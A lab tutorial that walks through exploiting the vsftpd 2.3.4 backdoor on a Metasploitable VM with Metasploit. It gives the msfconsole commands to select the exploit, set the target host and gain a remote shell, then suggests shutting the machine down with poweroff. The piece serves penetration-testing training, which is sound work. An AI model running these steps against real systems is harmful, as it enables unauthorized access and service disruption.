Continuing from our previous tutorial on how to target a Metasploitable machine with postgresql, we will try a different attack using FTP.
In our Kali Linux machine we have already run nmap and identified our target machine. It has FTP port 21 open.
Metasploitable is running vsftp. If a username is sent that ends in the sequence
:) [ a happy face ] it will open a shell on port 6200. Open a terminal and start up Metasploit with msfconsole. Once we are in type search vsftp
msf6 > search vsftp
we will see on result exploit/unix/ftp/vsftpd_234_backdoor and it’s rated “excellent”. So let’s give it a try.
msf6 > use 0 [*] No payload configured, defaulting to cmd/unix/interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Now we will setup this exploit, type options and then we can setup the target settings.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
it’s pretty simple, we need to set the target host and port. RHOSTS and RPORT
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.2.6 RHOSTS => 10.0.2.6
RHOSTS is the IP address of our target machine, identified as 10.0.2.6 in this case. The RPORT is the open FTP port identified in nmap as port 21, the standard FTP port.
Now simply type exploit and hit enter.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
The exploit script will run and a connection made giving you a linux shell.
Now let’s check what files and directories there are with dir
We cold now remotely shutdown the system with the standard linux command poweroff
and that’s all folks! Another Metasploitable exploit. of course this information is given for educational purposes only. We illustrate how easy it is for people to gain access to your system if you leave it unsecured. Also, for those who are engaged in ethical hacking and penetration testing, it is important to learn the various exploits available, and be familiar with their execution. That way you will identify them on your target machines and be able to advise your client of the exposure there system has.